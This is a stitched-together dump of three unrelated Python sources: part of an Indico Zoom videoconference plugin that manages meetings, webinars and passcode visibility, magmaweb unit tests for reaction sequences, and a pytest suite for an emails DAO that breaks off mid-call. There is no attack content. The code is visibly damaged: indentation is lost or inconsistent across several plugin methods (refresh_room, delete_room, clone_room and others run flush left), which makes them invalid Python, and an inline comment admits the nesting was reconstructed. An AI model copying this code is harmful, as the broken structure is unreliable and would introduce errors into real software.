    self.template_hook('event-vc-room-list-item-labels', self._render_vc_room_labels)
    # Inject the plugin JS into the event display / VC management pages.
    self.inject_bundle('main.js', WPSimpleEventDisplay)
    self.inject_bundle('main.js', WPVCEventPage)
    self.inject_bundle('main.js', WPVCManageEvent)
@property
def logo_url(self):
    # URL of the plugin's logo image served from the plugin's static files.
    return url_for_plugin(self.name + '.static', filename='images/zoom_logo.png')
@property
def icon_url(self):
    # Icon URL; reuses the same image as `logo_url`.
    return url_for_plugin(self.name + '.static', filename='images/zoom_logo.png')
def create_form(self, event, existing_vc_room=None, existing_event_vc_room=None):
    """Override the default room form creation mechanism."""
    # On a GET of the edit form, sync local data with Zoom first.
    if existing_vc_room and request.method != 'POST':
        try:
            self.refresh_room(existing_vc_room, event)
        except VCRoomNotFoundError as exc:
            raise UserValueError(str(exc))
        except VCRoomError:
            # maybe a temporary issue - we just keep going and fail when saving in
            # case it's something more persistent
            pass
    form = super().create_form(
        event,
        existing_vc_room=existing_vc_room,
        existing_event_vc_room=existing_event_vc_room
    )

    # NOTE(review): nesting below reconstructed from a whitespace-mangled
    # source -- confirm against upstream before relying on it.
    if existing_vc_room:
        form.host_choice.render_kw = {'disabled': True}
        form.host_user.render_kw = {'disabled': True}
        if self.settings.get('allow_webinars'):
            # if we're editing a VC room, we will not allow the meeting type to be changed
            form.meeting_type.render_kw = {'disabled': True}
            if form.data['meeting_type'] == 'webinar':
                # webinar hosts cannot be changed through the API
                form.host_choice.render_kw = {'disabled': True}
                form.host_user.render_kw = {'disabled': True}
    elif not form.is_submitted():
        # fresh creation form (GET): suggest a random meeting password
        form.password.data = gen_random_password()
    return form
def get_extra_delete_msg(self, vc_room, event_vc_room):
    """
    Return extra HTML for the delete confirmation; empty string when
    the current user is the host or the room is linked to one event only.
    """
    host = principal_from_identifier(vc_room.data['host'])
    if host == session.user or len(vc_room.events) <= 1:
        return ''
    return render_plugin_template('vc_zoom:extra_delete_msg.html', host=host.full_name)
def _extend_indico_cli(self, sender, **kwargs):
    # signals.plugin.cli handler: expose this plugin's CLI commands.
    return cli
def update_data_association(self, event, vc_room, room_assoc, data):
    """
    Update the event<->VC room association and keep the Zoom meeting's
    schedule in sync when the association or its link object changed.
    """
    # XXX: This feels slightly hacky. Maybe we should change the API on the core?
    association_is_new = room_assoc.vc_room is None
    old_link = room_assoc.link_object
    # in a new room, `meeting_type` comes in `data`, otherwise it's already in the VCRoom
    is_webinar = data.get('meeting_type', vc_room.data and vc_room.data.get('meeting_type')) == 'webinar'
    super().update_data_association(event, vc_room, room_assoc, data)

    if vc_room.data:
        try:
            # this is not a new room
            if association_is_new:
                # this means we are updating an existing meeting with a new vc_room-event association
                update_zoom_meeting(vc_room.data['zoom_id'], {
                    'start_time': None,
                    'duration': None,
                    'type': (
                        ZoomMeetingType.recurring_webinar_no_time
                        if is_webinar
                        else ZoomMeetingType.recurring_meeting_no_time
                    )
                })
            elif room_assoc.link_object != old_link:
                # the booking should now be linked to something else
                new_schedule_args = (get_schedule_args(room_assoc.link_object)
                                     if room_assoc.link_object.start_dt
                                     else {})
                meeting = fetch_zoom_meeting(vc_room)
                current_schedule_args = {k: meeting[k] for k in {'start_time', 'duration'} if k in meeting}

                # check whether the start time / duration of the scheduled meeting differs
                if new_schedule_args != current_schedule_args:
                    if new_schedule_args:
                        update_zoom_meeting(vc_room.data['zoom_id'], new_schedule_args)
                    else:
                        # no schedule anymore -> convert to a "no time" recurring meeting
                        update_zoom_meeting(vc_room.data['zoom_id'], {
                            'start_time': None,
                            'duration': None,
                            'type': (
                                ZoomMeetingType.recurring_webinar_no_time
                                if is_webinar
                                else ZoomMeetingType.recurring_meeting_no_time
                            )
                        })
        except VCRoomNotFoundError as exc:
            raise UserValueError(str(exc)) from exc

    # NOTE(review): pop() raises KeyError if 'password_visibility' is
    # missing from `data` -- presumably guaranteed by the form; confirm.
    room_assoc.data['password_visibility'] = data.pop('password_visibility')
    flag_modified(room_assoc, 'data')
def update_data_vc_room(self, vc_room, data, is_new=False):
    """Move the recognized form fields from `data` into `vc_room.data`."""
    super().update_data_vc_room(vc_room, data)

    fields = {'description', 'password'}

    # we may end up not getting a meeting_type from the form
    # (i.e. webinars are disabled)
    data.setdefault('meeting_type', 'regular' if is_new else vc_room.data['meeting_type'])

    if data['meeting_type'] == 'webinar':
        fields |= {'mute_host_video'}
        # host/meeting_type of an existing webinar cannot be changed
        if is_new:
            fields |= {'host', 'meeting_type'}
    else:
        fields |= {
            'meeting_type', 'host', 'mute_audio', 'mute_participant_video', 'mute_host_video', 'join_before_host',
            'waiting_room'
        }

    for key in fields:
        if key in data:
            vc_room.data[key] = data.pop(key)
    flag_modified(vc_room, 'data')
def create_room(self, vc_room, event):
    """Create a new Zoom room for an event, given a VC room.

    In order to create the Zoom room, the function will try to get
    a valid e-mail address for the user in question, which can be
    used with the Zoom API.

    :param vc_room: the VC room from which to create the Zoom room
    :param event: the event the Zoom room will be attached to
    """
    client = ZoomIndicoClient()
    host = principal_from_identifier(vc_room.data['host'])
    host_email = find_enterprise_email(host)

    # get the object that this booking is linked to
    vc_room_assoc = vc_room.events[0]
    link_obj = vc_room_assoc.link_object
    is_webinar = vc_room.data.setdefault('meeting_type', 'regular') == 'webinar'
    # only scheduled if the link object has a start date
    scheduling_args = get_schedule_args(link_obj) if link_obj.start_dt else {}

    try:
        settings = {
            'host_video': not vc_room.data['mute_host_video'],
        }
        kwargs = {}
        if is_webinar:
            kwargs['type'] = (ZoomMeetingType.webinar
                              if scheduling_args
                              else ZoomMeetingType.recurring_webinar_no_time)
            settings['alternative_hosts'] = host_email
        else:
            kwargs = {
                'type': (
                    ZoomMeetingType.scheduled_meeting
                    if scheduling_args
                    else ZoomMeetingType.recurring_meeting_no_time
                ),
                'schedule_for': host_email
            }
            # meeting-only settings (not applicable to webinars)
            settings.update({
                'mute_upon_entry': vc_room.data['mute_audio'],
                'participant_video': not vc_room.data['mute_participant_video'],
                'waiting_room': vc_room.data['waiting_room'],
                'join_before_host': self.settings.get('join_before_host'),
            })

        kwargs.update({
            'topic': vc_room.name,
            'agenda': vc_room.data['description'],
            'password': vc_room.data['password'],
            'timezone': event.timezone,
            'settings': settings
        })
        kwargs.update(scheduling_args)
        if is_webinar:
            meeting_obj = client.create_webinar(host_email, **kwargs)
        else:
            meeting_obj = client.create_meeting(host_email, **kwargs)
    except HTTPError as e:
        self.logger.exception('Error creating Zoom Room: %s', e.response.content)
        raise VCRoomError(_('Could not create the room in Zoom. Please contact support if the error persists'))

    # persist the Zoom identifiers/URLs on the VC room
    vc_room.data.update({
        'zoom_id': str(meeting_obj['id']),
        'start_url': meeting_obj['start_url'],
        'host': host.identifier,
        'alternative_hosts': process_alternative_hosts(meeting_obj['settings'].get('alternative_hosts', ''))
    })
    vc_room.data.update(get_url_data_args(meeting_obj['join_url']))
    flag_modified(vc_room, 'data')

    # e-mail Host URL to meeting host
    if self.settings.get('send_host_url'):
        notify_host_start_url(vc_room)
    def update_room(self, vc_room, event):
        """Push local changes on ``vc_room`` to the corresponding Zoom meeting/webinar.

        Fetches the live Zoom object, builds a minimal ``changes`` payload from
        the fields that differ, and only calls the update API when there is
        something to change.  The join URL is always re-fetched afterwards, as
        it may change (e.g. when the password changed).
        """
        client = ZoomIndicoClient()
        is_webinar = vc_room.data['meeting_type'] == 'webinar'
        zoom_meeting = fetch_zoom_meeting(vc_room, client=client, is_webinar=is_webinar)
        changes = {}
        if vc_room.name != zoom_meeting['topic']:
            changes['topic'] = vc_room.name
        if vc_room.data['description'] != zoom_meeting.get('agenda', ''):
            changes['agenda'] = vc_room.data['description']
        if vc_room.data['password'] != zoom_meeting['password']:
            changes['password'] = vc_room.data['password']
        zoom_meeting_settings = zoom_meeting['settings']
        # 'mute_host_video' is the logical inverse of Zoom's 'host_video' flag,
        # so *equal* values mean the two sides are out of sync
        if vc_room.data['mute_host_video'] == zoom_meeting_settings['host_video']:
            changes.setdefault('settings', {})['host_video'] = not vc_room.data['mute_host_video']
        alternative_hosts = process_alternative_hosts(zoom_meeting_settings.get('alternative_hosts', ''))
        if vc_room.data['alternative_hosts'] != alternative_hosts:
            new_alt_host_emails = get_alt_host_emails(vc_room.data['alternative_hosts'])
            # Zoom expects a single comma-separated string of emails here
            changes.setdefault('settings', {})['alternative_hosts'] = ','.join(new_alt_host_emails)
        # these settings only exist on regular meetings, not on webinars
        if not is_webinar:
            if vc_room.data['mute_audio'] != zoom_meeting_settings['mute_upon_entry']:
                changes.setdefault('settings', {})['mute_upon_entry'] = vc_room.data['mute_audio']
            # inverse flags again: equality means they disagree (see host_video above)
            if vc_room.data['mute_participant_video'] == zoom_meeting_settings['participant_video']:
                changes.setdefault('settings', {})['participant_video'] = not vc_room.data['mute_participant_video']
            if vc_room.data['waiting_room'] != zoom_meeting_settings['waiting_room']:
                changes.setdefault('settings', {})['waiting_room'] = vc_room.data['waiting_room']
        if changes:
            update_zoom_meeting(vc_room.data['zoom_id'], changes, is_webinar=is_webinar)
        # always refresh meeting URL (it may have changed if password changed)
        zoom_meeting = fetch_zoom_meeting(vc_room, client=client, is_webinar=is_webinar)
        vc_room.data.update(get_url_data_args(zoom_meeting['join_url']))
def refresh_room(self, vc_room, event):
is_webinar = vc_room.data['meeting_type'] == 'webinar'
zoom_meeting = fetch_zoom_meeting(vc_room, is_webinar=is_webinar)
vc_room.name = zoom_meeting['topic']
vc_room.data.update({
'description': zoom_meeting.get('agenda', ''),
'zoom_id': zoom_meeting['id'],
'password': zoom_meeting['password'],
'mute_host_video': zoom_meeting['settings']['host_video'],
# these options will be empty for webinars
'mute_audio': zoom_meeting['settings'].get('mute_upon_entry'),
'mute_participant_video': not zoom_meeting['settings'].get('participant_video'),
'waiting_room': zoom_meeting['settings'].get('waiting_room'),
'alternative_hosts': process_alternative_hosts(zoom_meeting['settings'].get('alternative_hosts'))
})
vc_room.data.update(get_url_data_args(zoom_meeting['join_url']))
flag_modified(vc_room, 'data')
def delete_room(self, vc_room, event):
client = ZoomIndicoClient()
zoom_id = vc_room.data['zoom_id']
is_webinar = vc_room.data['meeting_type'] == 'webinar'
try:
if is_webinar:
client.delete_webinar(zoom_id)
else:
client.delete_meeting(zoom_id)
except HTTPError as e:
# if there's a 404, there is no problem, since the room is supposed to be gone anyway
if e.response.status_code == 404:
if has_request_context():
flash(_("Room didn't exist in Zoom anymore"), 'warning')
elif e.response.status_code == 400:
# some sort of operational error on Zoom's side, deserves a specific error message
raise VCRoomError(_('Zoom Error: "{}"').format(e.response.json()['message']))
else:
self.logger.error("Can't delete room")
raise VCRoomError(_('Problem deleting room'))
def clone_room(self, old_event_vc_room, link_object):
vc_room = old_event_vc_room.vc_room
is_webinar = vc_room.data.get('meeting_type', 'regular') == 'webinar'
has_only_one_association = len({assoc.event_id for assoc in vc_room.events}) == 1
if has_only_one_association:
try:
update_zoom_meeting(vc_room.data['zoom_id'], {
'start_time': None,
'duration': None,
'type': (
ZoomMeetingType.recurring_webinar_no_time
if is_webinar
else ZoomMeetingType.recurring_meeting_no_time
)
})
except VCRoomNotFoundError:
# this check is needed in order to avoid multiple flashes
if vc_room.status != VCRoomStatus.deleted:
# mark room as deleted
vc_room.status = VCRoomStatus.deleted
flash(
_('The room "{}" no longer exists in Zoom and was removed from the event').format(vc_room.name),
'warning'
)
# no need to create an association to a room marked as deleted
return None
# return the new association
return super().clone_room(old_event_vc_room, link_object)
    def get_blueprints(self):
        """Return the plugin's Flask blueprint."""
        return blueprint
def get_vc_room_form_defaults(self, event):
defaults = super().get_vc_room_form_defaults(event)
defaults.update({
'meeting_type': 'regular' if self.settings.get('allow_webinars') else None,
'mute_audio': self.settings.get('mute_audio'),
'mute_host_video': self.settings.get('mute_host_video'),
'mute_participant_video': self.settings.get('mute_participant_video'),
'waiting_room': self.settings.get('waiting_room'),
'host_choice': 'myself',
'host_user': None,
'password_visibility': 'logged_in'
})
return defaults
    def get_vc_room_attach_form_defaults(self, event):
        """Return default values for the form used to attach an existing room."""
        defaults = super().get_vc_room_attach_form_defaults(event)
        # by default the passcode is only shown to logged-in users
        defaults['password_visibility'] = 'logged_in'
        return defaults
def can_manage_vc_room(self, user, room):
return (
user == principal_from_identifier(room.data['host']) or
super().can_manage_vc_room(user, room)
)
def _merge_users(self, target, source, **kwargs):
super()._merge_users(target, source, **kwargs)
for room in VCRoom.query.filter(
VCRoom.type == self.service_name, VCRoom.data.contains({'host': source.identifier})
):
room.data['host'] = target.identifier
flag_modified(room, 'data')
for room in VCRoom.query.filter(
VCRoom.type == self.service_name, VCRoom.data.contains({'alternative_hosts': [source.identifier]})
):
room.data['alternative_hosts'].remove(source.identifier)
room.data['alternative_hosts'].append(target.identifier)
flag_modified(room, 'data')
def get_notification_cc_list(self, action, vc_room, event):
return {principal_from_identifier(vc_room.data['host']).email}
def _render_vc_room_labels(self, event, vc_room, **kwargs):
if vc_room.plugin != self:
return
return render_plugin_template('room_labels.html', vc_room=vc_room)
def _times_changed(self, sender, obj, **kwargs):
from indico.modules.events.contributions.models.contributions import Contribution
from indico.modules.events.models.events import Event
from indico.modules.events.sessions.models.blocks import SessionBlock
if not hasattr(obj, 'vc_room_associations'):
return
if any(assoc.vc_room.type == 'zoom' and len(assoc.vc_room.events) == 1 for assoc in obj.vc_room_associations):
if sender == Event:
message = _('There are one or more scheduled Zoom meetings associated with this event which were not '
'automatically updated.')
elif sender == Contribution:
message = _('There are one or more scheduled Zoom meetings associated with the contribution "{}" which '
' were not automatically updated.').format(obj.title)
elif sender == SessionBlock:
message = _('There are one or more scheduled Zoom meetings associated with this session block which '
'were not automatically updated.')
else:
return
flash(message, 'warning')
def _event_metadata_postprocess(self, sender, event, data, user=None, **kwargs):
urls = []
if 'description' in kwargs.get('html_fields', ()):
linebreak = '<br>\n'
format_link = lambda name, url: f'<a href="{url}">{escape(name)}: {url}</a>'
else:
linebreak = '\n'
format_link = lambda name, url: f'{name}: {url}'
for assoc in event.vc_room_associations:
if not assoc.show or assoc.vc_room.type != 'zoom':
continue
visibility = assoc.data.get('password_visibility', 'logged_in')
if (
visibility == 'everyone' or
(visibility == 'logged_in' and user is not None) or
(visibility == 'registered' and user is not None and event.is_user_registered(user)) or
event.can_manage(user)
):
urls.append(format_link(assoc.vc_room.name, assoc.vc_room.data['url']))
elif visibility == 'no_one':
# XXX: Not sure if showing this is useful, but on the event page we show the join link
# with no passcode as well, so let's the logic identical here.
urls.append(format_link(assoc.vc_room.name, assoc.vc_room.data['public_url']))
if urls:
return {'description': (data['description'] + (linebreak * 2) + linebreak.join(urls)).strip()}
| |
import unittest
import json
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from magmaweb.models import ReactionSequence, Molecule, Reaction
from magmaweb.models import fill_molecules_reactions
class TestReactionSequence(unittest.TestCase):
    """Tests for the ReactionSequence column type (JSON (de)serialization)."""
    reactions = {
        'products': [{
            'esterase': {'nr': 123, 'nrp': 45}
        }],
        'reactants': [{
            'theogallin': {'nr': 678, 'nrp': 90}
        }]
    }
    reactions_json = ('{"reactants": [{"theogallin": {"nr": 678, "nrp": 90}}]'
                      ', "products": [{"esterase": {"nr": 123, "nrp": 45}}]}')
    def setUp(self):
        self.rs = ReactionSequence()
    def test_set(self):
        serialized = self.rs.process_bind_param(self.reactions, 'sqlite')
        # compare parsed forms to avoid depending on key ordering
        self.assertEqual(json.loads(serialized), json.loads(self.reactions_json))
    def test_set_none(self):
        self.assertIsNone(self.rs.process_bind_param(None, 'sqlite'))
    def test_get(self):
        self.assertEqual(self.rs.process_result_value(self.reactions_json, 'sqlite'), self.reactions)
    def test_get_empty(self):
        self.assertEqual(self.rs.process_result_value(u'', 'sqlite'), {})
    def test_get_none(self):
        self.assertIsNone(self.rs.process_result_value(None, 'sqlite'))
    def test_get_badjson2empty(self):
        # invalid JSON is treated as an empty reaction sequence
        self.assertEqual(self.rs.process_result_value(u'PARENT', 'sqlite'), {})
class TestFillMoleculeReactions(unittest.TestCase):
    """Tests for fill_molecules_reactions(), which aggregates each molecule's
    reactions into its ``reactionsequence`` column.

    In the diagrams below ``a -r> b`` means reaction ``r`` turns molecule ``a``
    (reactant) into molecule ``b`` (product).  In the expected dicts, ``nr``
    counts reactions with that name; ``nrp`` appears to count only those whose
    counterpart molecule has hits (cf. molecule 3 with nhits=0) — TODO confirm
    against magmaweb.models.
    """
    def setUp(self):
        # default use a in memory db
        url = 'sqlite://'
        engine = create_engine(url)
        self.Session = sessionmaker(bind=engine)
        # imported here so the in-memory engine exists before table creation
        from magmaweb.models import Base
        Base.metadata.create_all(engine)  # @UndefinedVariable
    def getReactionSequence(self, molid):
        """Return the aggregated reactionsequence dict of molecule ``molid``."""
        return self.Session().query(Molecule).get(molid).reactionsequence
    def test_noreactions(self):
        """A molecule with no reactions gets an empty reaction sequence."""
        session = self.Session()
        session.add(Molecule(
            molid=1, nhits=1
        ))
        session.flush()
        fill_molecules_reactions(session)
        self.assertDictEqual(self.getReactionSequence(1), {})
    def test_singlereaction(self):
        """
        1 -1> 2
        """
        session = self.Session()
        session.add(Molecule(molid=1, nhits=1))
        session.add(Molecule(molid=2, nhits=1))
        session.add(Reaction(reactid=1, name=u'esterase',
                             reactant=1, product=2))
        session.flush()
        fill_molecules_reactions(session)
        # molecule 1 is a reactant, so the reaction shows up under 'products'
        expected1 = {
            u'products': {
                u'esterase': {
                    u'nr': 1,
                    u'nrp': 1
                }
            }
        }
        self.assertDictEqual(self.getReactionSequence(1), expected1)
        # molecule 2 is a product, so the reaction shows up under 'reactants'
        expected2 = {
            u'reactants': {
                u'esterase': {
                    u'nr': 1,
                    u'nrp': 1
                }
            }
        }
        self.assertDictEqual(self.getReactionSequence(2), expected2)
    def test_reactionson2molecules(self):
        """
        1 -1> 2 -2> 1
        """
        session = self.Session()
        session.add(Molecule(molid=1, nhits=1))
        session.add(Molecule(molid=2, nhits=1))
        session.add(Reaction(reactid=1, name=u'esterase',
                             reactant=1, product=2))
        session.add(Reaction(reactid=2, name=u'theogallin',
                             reactant=2, product=1))
        session.flush()
        fill_molecules_reactions(session)
        # each molecule appears on both sides of the cycle
        expected1 = {
            u'products': {
                u'esterase': {
                    u'nr': 1,
                    u'nrp': 1
                }
            },
            u'reactants': {
                u'theogallin': {
                    u'nr': 1,
                    u'nrp': 1
                }
            }
        }
        self.assertDictEqual(self.getReactionSequence(1), expected1)
        expected2 = {
            u'products': {
                u'theogallin': {
                    u'nr': 1,
                    u'nrp': 1
                }
            },
            u'reactants': {
                u'esterase': {
                    u'nr': 1,
                    u'nrp': 1
                }
            }
        }
        self.assertDictEqual(self.getReactionSequence(2), expected2)
    def test_reactionson4molecules(self):
        """
        1 -1> 2 -3> 4
        1 -2> 3 -4> 4
        """
        session = self.Session()
        session.add(Molecule(molid=1, nhits=1))
        session.add(Molecule(molid=2, nhits=1))
        # molecule 3 has no hits; note its reactions get 'nr' but no 'nrp' below
        session.add(Molecule(molid=3, nhits=0))
        session.add(Molecule(molid=4, nhits=1))
        session.add(Reaction(reactid=1, name=u'esterase',
                             reactant=1, product=2))
        session.add(Reaction(reactid=2, name=u'theogallin',
                             reactant=1, product=3))
        session.add(Reaction(reactid=3, name=u'dehydrox',
                             reactant=2, product=4))
        session.add(Reaction(reactid=4, name=u'reduc',
                             reactant=3, product=4))
        session.flush()
        fill_molecules_reactions(session)
        expected1 = {
            u'products': {u'esterase': {u'nr': 1, u'nrp': 1},
                          u'theogallin': {u'nr': 1}}
        }
        self.assertDictEqual(self.getReactionSequence(1), expected1)
        expected2 = {
            u'reactants': {u'esterase': {u'nr': 1, u'nrp': 1}},
            u'products': {u'dehydrox': {u'nr': 1, u'nrp': 1}}
        }
        self.assertDictEqual(self.getReactionSequence(2), expected2)
        expected3 = {
            u'reactants': {u'theogallin': {u'nr': 1, u'nrp': 1}},
            u'products': {u'reduc': {u'nr': 1, u'nrp': 1}}
        }
        self.assertDictEqual(self.getReactionSequence(3), expected3)
        expected4 = {
            u'reactants': {u'dehydrox': {u'nr': 1, u'nrp': 1},
                           u'reduc': {u'nr': 1}}
        }
        self.assertDictEqual(self.getReactionSequence(4), expected4)
    def test_reactionson1reaction2reactants(self):
        """
        1 -1> 2
        1 -1> 3
        """
        session = self.Session()
        session.add(Molecule(molid=1, nhits=1))
        session.add(Molecule(molid=2, nhits=1))
        session.add(Molecule(molid=3, nhits=1))
        session.add(Reaction(reactid=1, name=u'esterase',
                             reactant=1, product=2))
        session.add(Reaction(reactid=2, name=u'esterase',
                             reactant=1, product=3))
        session.flush()
        fill_molecules_reactions(session)
        # two same-named reactions starting from molecule 1 are aggregated
        expected1 = {
            u'products': {u'esterase': {u'nr': 2, u'nrp': 2}},
        }
        self.assertDictEqual(self.getReactionSequence(1), expected1)
        expected2 = {
            u'reactants': {u'esterase': {u'nr': 1, u'nrp': 1}},
        }
        self.assertDictEqual(self.getReactionSequence(2), expected2)
        expected3 = {
            u'reactants': {u'esterase': {u'nr': 1, u'nrp': 1}},
        }
        self.assertDictEqual(self.getReactionSequence(3), expected3)
    def test_reactionson1reaction2products(self):
        """
        1 -1> 2
        3 -1> 2
        """
        session = self.Session()
        session.add(Molecule(molid=1, nhits=1))
        session.add(Molecule(molid=2, nhits=1))
        session.add(Molecule(molid=3, nhits=1))
        session.add(Reaction(reactid=1, name=u'esterase',
                             reactant=1, product=2))
        session.add(Reaction(reactid=2, name=u'esterase',
                             reactant=3, product=2))
        session.flush()
        fill_molecules_reactions(session)
        expected1 = {
            u'products': {u'esterase': {u'nr': 1, u'nrp': 1}},
        }
        self.assertDictEqual(self.getReactionSequence(1), expected1)
        # two same-named reactions ending at molecule 2 are aggregated
        expected2 = {
            u'reactants': {u'esterase': {u'nr': 2, u'nrp': 2}},
        }
        self.assertDictEqual(self.getReactionSequence(2), expected2)
        expected3 = {
            u'products': {u'esterase': {u'nr': 1, u'nrp': 1}},
        }
        self.assertDictEqual(self.getReactionSequence(3), expected3)
| |
from datetime import datetime, timedelta
import pytest
from freezegun import freeze_time
from sqlalchemy.exc import IntegrityError
from app.dao.emails_dao import (
dao_add_member_sent_to_email,
dao_get_emails_for_year_starting_on,
dao_get_emails_sent_count,
dao_get_todays_email_count_for_provider,
dao_get_past_hour_email_count_for_provider,
dao_get_email_by_id,
dao_get_future_emails,
dao_get_latest_emails,
dao_update_email,
_get_nearest_bi_monthly_send_date,
dao_get_approved_emails_for_sending
)
from app.errors import InvalidRequest
from app.models import Email, EmailToMember, ANON_REMINDER, ANNOUNCEMENT, MAGAZINE, APPROVED, READY
from tests.db import create_email, create_email_provider, create_email_to_member, create_magazine, create_member
class WhenUsingEmailsDAO(object):
    """pytest-describe style tests for app.dao.emails_dao.

    ``db``/``db_session`` and the ``sample_*`` arguments are pytest fixtures
    supplied by the project's conftest (not visible here).
    """
    def it_creates_an_email(self, db_session):
        email = create_email()
        assert Email.query.count() == 1
        email_from_db = Email.query.filter(Email.id == email.id).first()
        assert email == email_from_db
    @freeze_time("2019-12-29T23:00:00")
    def it_creates_a_magazine_email(self, db_session):
        magazine = create_magazine()
        email = create_email(magazine_id=magazine.id, email_type=MAGAZINE, old_id=None)
        assert Email.query.count() == 1
        email_from_db = Email.query.filter(Email.id == email.id).first()
        assert email == email_from_db
        assert email_from_db.magazine_id == magazine.id
    def it_doesnt_create_a_magazine_email_if_no_match(self, db_session, sample_uuid):
        # a magazine_id that matches no magazine must be rejected
        with pytest.raises(expected_exception=InvalidRequest):
            create_email(magazine_id=sample_uuid, email_type=MAGAZINE, old_id=None)
        assert Email.query.count() == 0
    def it_doesnt_create_a_magazine_email_if_no_magazine_id(self, db_session):
        create_email(email_type=MAGAZINE, old_id=None)
        assert Email.query.count() == 0
    def it_creates_an_event_email(self, db_session, sample_event_with_dates):
        email = create_email(event_id=sample_event_with_dates.id, old_event_id=None)
        assert Email.query.count() == 1
        email_from_db = Email.query.filter(Email.id == email.id).first()
        assert email == email_from_db
        # event emails start being sent 2 weeks before the first event date
        assert email_from_db.send_starts_at == \
            datetime.strptime(sample_event_with_dates.get_first_event_date(), "%Y-%m-%d") - timedelta(weeks=2)
    def it_updates_an_email_dao(self, db, db_session, sample_email):
        dao_update_email(sample_email.id, send_starts_at='2019-06-05', extra_txt='test update')
        email_from_db = Email.query.filter(Email.id == sample_email.id).first()
        assert email_from_db.extra_txt == 'test update'
    def it_updates_an_email_with_members_sent_to_dao(self, db, db_session, sample_email, sample_member):
        members = [sample_member]
        dao_update_email(sample_email.id, members_sent_to=members)
        email_from_db = Email.query.filter(Email.id == sample_email.id).first()
        assert email_from_db.members_sent_to == members
    def it_adds_a_member_sent_to_email_for_first_member(self, db, db_session, sample_email, sample_member):
        # note: the input date '2019-08-1' is normalized to '2019-08-01' below
        dao_add_member_sent_to_email(sample_email.id, sample_member.id, created_at='2019-08-1 12:00:00')
        email_from_db = Email.query.filter(Email.id == sample_email.id).first()
        assert email_from_db.members_sent_to == [sample_member]
        email_to_member = EmailToMember.query.filter_by(email_id=sample_email.id, member_id=sample_member.id).first()
        assert str(email_to_member.created_at) == '2019-08-01 12:00:00'
    def it_adds_a_member_sent_to_email(self, db, db_session, sample_email, sample_member):
        members = [sample_member]
        dao_update_email(sample_email.id, members_sent_to=members)
        member = create_member(name='New member', email='new_member@example.com')
        dao_add_member_sent_to_email(sample_email.id, member.id)
        email_from_db = Email.query.filter(Email.id == sample_email.id).first()
        assert email_from_db.members_sent_to == [sample_member, member]
    def it_does_not_add_an_existing_member_sent_to_email(self, db, db_session, sample_email, sample_member):
        members = [sample_member]
        dao_update_email(sample_email.id, members_sent_to=members)
        # adding the same member twice violates the unique constraint
        with pytest.raises(expected_exception=IntegrityError):
            dao_add_member_sent_to_email(sample_email.id, sample_member.id)
        email_from_db = Email.query.filter(Email.id == sample_email.id).first()
        assert email_from_db.members_sent_to == [sample_member]
    @freeze_time("2019-06-10T10:00:00")
    def it_gets_emails_from_starting_date_from_last_year(self, db, db_session, sample_email):
        emails = [create_email(details='more details', created_at='2019-01-01'), sample_email]
        emails_from_db = dao_get_emails_for_year_starting_on()
        assert Email.query.count() == 2
        assert set(emails) == set(emails_from_db)
    @freeze_time("2019-06-10T10:00:00")
    def it_gets_emails_from_starting_date_from_specified_date(self, db, db_session):
        emails = [
            create_email(details='more details', created_at='2019-02-01'),
            create_email(details='more details', created_at='2018-02-01')
        ]
        # only the 2018 email falls in the year starting on 2018-01-01
        emails_from_db = dao_get_emails_for_year_starting_on('2018-01-01')
        assert len(emails_from_db) == 1
        assert emails[1] == emails_from_db[0]
    def it_gets_an_email_by_id(self, db, db_session, sample_email):
        email = create_email(details='new event details')
        fetched_email = dao_get_email_by_id(email.id)
        assert fetched_email == email
    @freeze_time("2019-07-10T10:00:00")
    def it_gets_future_emails(self, db, db_session):
        active_email = create_email(created_at='2019-07-01 11:00', send_starts_at='2019-07-10', expires='2019-07-20')
        active_email_2 = create_email(created_at='2019-07-01 11:00', send_starts_at='2019-07-01', expires='2019-07-12')
        active_email_3 = create_email(created_at='2019-07-01 11:00', send_starts_at='2019-07-11', expires='2019-07-18')
        # these emails below are not active
        create_email(created_at='2019-07-01 11:00', send_starts_at='2019-07-01', expires='2019-07-09')
        emails_from_db = dao_get_future_emails()
        assert len(emails_from_db) == 3
        assert emails_from_db[0] == active_email
        assert emails_from_db[1] == active_email_2
        assert emails_from_db[2] == active_email_3
    def it_gets_latest_announcement_event_magazine_emails(self, db_session, sample_magazine):
        event_email = create_email()
        magazine_email = create_email(email_type=MAGAZINE, magazine_id=sample_magazine.id)
        announcement_email = create_email(email_type=ANNOUNCEMENT)
        anon_reminder_email = create_email(email_type=ANON_REMINDER)
        emails = dao_get_latest_emails()
        # anon-reminder emails are excluded from the latest emails
        assert len(emails) == 3
        assert set([event_email, magazine_email, announcement_email]) == set(emails)
        assert anon_reminder_email not in emails
    def it_gets_latest_magazine_email_only(self, db_session, sample_magazine):
        later_magazine = create_magazine(title='ignored magazine')
        event_email = create_email()
        create_email(email_type=MAGAZINE, magazine_id=sample_magazine.id)
        later_magazine_email = create_email(email_type=MAGAZINE, magazine_id=later_magazine.id)
        emails = dao_get_latest_emails()
        # only the most recent magazine email is returned
        assert len(emails) == 2
        assert set([event_email, later_magazine_email]) == set(emails)
    @freeze_time("2020-04-14T23:30:00 BST+0100")
    def it_get_todays_emails_count(self, db_session):
        email_to_member = create_email_to_member()
        assert dao_get_todays_email_count_for_provider(email_to_member.email_provider_id) == 1
    @freeze_time("2020-04-14T20:30:00 BST+0100")
    def it_gets_emails_count_only_for_today_only(self, db, db_session):
        email = create_email()
        member = create_member(email='test1@example.com', name='Test1')
        # this row is a day old and must not be counted
        created_at = datetime.now() - timedelta(days=1)
        create_email_to_member(created_at=created_at, email_id=email.id, member_id=member.id)
        email_to_member = create_email_to_member()
        assert dao_get_todays_email_count_for_provider(email_to_member.email_provider_id) == 1
    @freeze_time("2020-04-14T20:30:00 BST+0100")
    def it_gets_emails_count_only_for_chosen_provider(self, db, db_session):
        email = create_email()
        member = create_member(email='test1@example.com', name='Test1')
        create_email_to_member(email_id=email.id, member_id=member.id)
        email_provider = create_email_provider(name='another', pos=2)
        email_to_member = create_email_to_member(email_provider_id=email_provider.id)
        assert dao_get_todays_email_count_for_provider(email_to_member.email_provider_id) == 1
    @freeze_time("2020-04-14T20:30:00 BST+0100")
    def it_gets_all_emails_count_for_chosen_provider(self, db, db_session):
        email = create_email()
        member = create_member(email='test1@example.com', name='Test1')
        create_email_to_member(email_id=email.id, member_id=member.id)
        email_to_member = create_email_to_member()
        assert dao_get_todays_email_count_for_provider(email_to_member.email_provider_id) == 2
    @freeze_time("2020-10-31T12:30:00 BST+0100")
    def it_gets_approved_emails_for_sending(self, db, db_session):
        create_email(
